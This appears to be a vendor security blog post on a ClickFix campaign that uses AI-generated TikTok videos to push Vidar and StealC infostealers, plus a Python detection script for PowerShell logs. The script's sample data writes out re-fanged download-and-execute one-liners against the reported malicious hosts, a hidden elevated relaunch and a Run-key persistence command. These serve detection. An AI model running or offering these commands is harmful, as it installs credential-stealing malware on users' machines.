Social media platforms like TikTok have become powerful tools for connection and entertainment, but they are also increasingly exploited by cybercriminals. A new campaign built on the “ClickFix” technique is using AI-generated TikTok videos to talk viewers into installing information-stealing malware with their own hands. Understanding how these attacks work is the first step to protecting yourself.
What is a ClickFix Attack?
ClickFix is a social-engineering tactic: attackers present a fake error message or verification step, such as a CAPTCHA prompt, and tell the target to “fix” it by copying a command and pasting it into the Windows Run dialog or a terminal. No vulnerability is exploited; the victim runs the malicious script themselves, which is why the technique sidesteps defenses that watch for suspicious downloads or attachments. While primarily aimed at Windows users through PowerShell commands, ClickFix has also been adapted for attacks against macOS and Linux users. Even state-sponsored threat groups like Russia’s APT28 and ColdRiver, North Korea’s Kimsuky, and Iran’s MuddyWater have used similar tactics in recent espionage campaigns.
In the specific TikTok campaign, cybercriminals are using videos, likely generated using AI, to entice users. These videos ask viewers to run commands disguised as steps to activate Windows and Microsoft Office, or to unlock premium features in legitimate software like CapCut and Spotify. Trend Micro observed that these videos are highly similar, with only minor differences in camera angles and the download URLs, suggesting automation in their creation. The instructional voice also appears AI-generated, further reinforcing the likelihood of AI tools being used.
The Deception: How the Malware Spreads
One such video, claiming to offer instructions on how to “boost your Spotify experience instantly,” garnered almost 500,000 views, over 20,000 likes, and more than 100 comments. In these videos, attackers prompt viewers to run a PowerShell command.
However, this command does not activate software or unlock features. Instead, it downloads and executes a remote script (e.g., from hxxps://allaivo[.]me/spotify) that installs Vidar or StealC information-stealing malware, launching it as a hidden process with elevated permissions. After the initial compromise, the script then downloads a second PowerShell script payload (e.g., from hxxps://amssh[.]co/script[.]ps1) which adds a registry key to ensure the malware launches automatically at startup, maintaining persistence on the infected device.
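The ClickFix pattern described above and the three-stage chain in this campaign (remote script piped into PowerShell, hidden and elevated relaunch, autostart registry entry) are the kind of thing PowerShell Script Block Logging (Event ID 4104) records verbatim, so they can be hunted for in logs. The following is an added example, not code from the original article or from Trend Micro: a small Python triage script that scores script-block text against those stages. The sample script blocks are constructed for this example; the two hostnames are the defanged IOCs quoted above (re-fanged so the URL extractor sees them), while the registry key path, file names and the indicator weights and thresholds are assumptions for illustration, not a vendor scoring scheme.

```python
"""Flag ClickFix-style PowerShell chains in Script Block Logging output.

Added example, not code from the original article or from Trend Micro.
It scans the text of PowerShell Script Block Logging events (Event ID 4104
in Microsoft-Windows-PowerShell/Operational) for the stages the article
describes: a remote script pulled down and piped into Invoke-Expression,
hidden or elevated execution, and an autostart entry under a
CurrentVersion\\Run key. Sample blocks, key paths, file names, weights and
thresholds below are constructed assumptions for this example.
"""
import re

# (name, pattern, weight). Word boundaries keep "irm" from matching inside
# unrelated identifiers; re.I covers PowerShell's case-insensitive syntax.
INDICATORS = [
    ("remote_fetch",
     re.compile(r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadFile)\b", re.I), 2),
    ("in_memory_exec", re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 2),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), 1),
    ("policy_bypass", re.compile(r"-(ep|executionpolicy)\s+bypass\b", re.I), 1),
    ("elevation", re.compile(r"-verb\s+runas\b", re.I), 1),
    ("run_key_persist", re.compile(r"\\CurrentVersion\\Run\b", re.I), 2),
]
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)


def analyze_script_block(text: str) -> dict:
    """Return the indicators hit, a weighted score, extracted URLs and a verdict."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    if "remote_fetch" in hits and "in_memory_exec" in hits:
        verdict = "clickfix_chain"      # download piped straight into execution
    elif score >= 3:
        verdict = "suspicious"          # e.g. hidden window plus a Run-key write
    else:
        verdict = "benign"              # a plain download to disk scores only 2
    return {"verdict": verdict, "score": score, "indicators": hits,
            "urls": URL_RE.findall(text)}


def triage(script_blocks):
    """Return (verdict, score, text) for every non-benign block, highest score first."""
    results = [(analyze_script_block(t), t) for t in script_blocks]
    flagged = [(r["verdict"], r["score"], t) for r, t in results if r["verdict"] != "benign"]
    return sorted(flagged, key=lambda item: -item[1])


# Constructed sample script blocks, in the order the article describes the chain.
SAMPLE_SCRIPT_BLOCKS = [
    # Stage 1: the one-liner the video tells the viewer to paste (article IOC, re-fanged).
    "iex (irm https://allaivo.me/spotify)",
    # Stage 2: the fetched script relaunching itself hidden and elevated (article IOC, re-fanged).
    'Start-Process powershell -WindowStyle Hidden -Verb RunAs '
    '-ArgumentList "-ep bypass -c iex (irm https://amssh.co/script.ps1)"',
    # Stage 3: autostart entry for persistence (key path and value are assumed).
    'Set-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" '
    '-Name Updater -Value "powershell -w hidden -c C:\\Users\\Public\\u.ps1"',
    # Benign admin activity that must not fire.
    "Get-ChildItem -Path C:\\Users -Recurse | Measure-Object",
    "Invoke-WebRequest https://example.org/release.zip -OutFile release.zip",
]

if __name__ == "__main__":
    for verdict, score, text in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"{verdict:16} score={score}  {text[:70]}")
```

Script Block Logging is off by default and has to be enabled by policy before Event ID 4104 exists to search. A useful second signal, independent of this script, is process lineage: a command pasted into the Run dialog produces a `powershell.exe` whose parent is `explorer.exe`, which is rare in normal administration and pairs well with the `iex`/`irm` match above.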
The Dangerous Payloads: Vidar and StealC Infostealers
Once deployed, these information-stealing malware variants can cause significant damage:
- Vidar is capable of taking desktop screenshots and stealing sensitive data including credentials, credit cards, cookies, cryptocurrency wallets, text files, and Authy 2FA authenticator databases.
- StealC is designed to harvest a wide range of sensitive information from infected computers, specifically targeting dozens of web browsers and cryptocurrency wallets.
Not the First Time TikTok Has Been Used for Malware
This isn’t an isolated incident. TikTok videos have been previously exploited to push malware. For example, cybercriminals capitalized on a trending ‘Invisible Challenge’ on TikTok to infect thousands with a fake app that installed WASP Stealer (Discord Token Grabber) malware. This particular malware was pushed through videos that received over a million views shortly after being posted and could steal Discord accounts, passwords, credit cards, and cryptocurrency wallets. In recent years, scammers have also flooded TikTok with fake cryptocurrency giveaways, often using themes related to Elon Musk, Tesla, or SpaceX.
Why You Should Purchase Software from Legitimate Sources
The ‘ClickFix’ attacks highlight a critical security lesson: attempting to obtain software through unofficial means, such as “cracks,” “activators,” or free downloads from untrusted sources, is incredibly risky. These methods are frequently used by cybercriminals to distribute malware, as seen with the TikTok campaigns offering “free” activation or premium features.
Purchasing software from legitimate, authorized sources (like reputable technology providers such as Blue Chip Technologies) ensures that you are receiving genuine, verified software free from malicious payloads. A vendor’s installer is code-signed and shipped with a published checksum, so its origin can be verified before it runs; it receives regular updates and patches and comes with proper support. Just as important is the tell that gives ClickFix away: no legitimate activation, licensing or “premium unlock” step ever asks you to paste a command into PowerShell, a terminal or the Run dialog. If a video or pop-up does, stop. Obtaining software only through trusted channels significantly reduces the risk of unknowingly installing infostealers or other malware onto your devices.
Protecting your digital life starts with smart choices about where and how you acquire your software.